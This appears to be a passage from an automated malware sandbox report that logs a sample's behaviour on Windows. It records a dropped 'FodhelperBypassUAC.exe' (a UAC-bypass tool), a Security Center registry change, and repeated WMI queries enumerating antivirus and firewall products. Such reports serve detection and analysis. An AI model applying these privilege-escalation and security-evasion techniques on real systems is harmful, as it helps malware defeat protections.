Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\dllhost.exe Code function: 94_2_0000000140002300 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW, 94_2_0000000140002300
Source: C:\Users\user\AppData\Local\Temp\FodhelperBypassUAC.exe Code function: 12_2_00007FF6CF6717C0 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 12_2_00007FF6CF6717C0
Source: C:\Users\user\Desktop\e7WMhx18XN.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings

Source: C:\Windows\System32\svchost.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cval
Source: dllhost.exe Binary or memory string: MsMpEng.exe
Source: C:\Windows\System32\svchost.exe WMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Program Files\Windows Defender\MpCmdRun.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
Source: C:\Program Files\Windows Defender\MpCmdRun.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct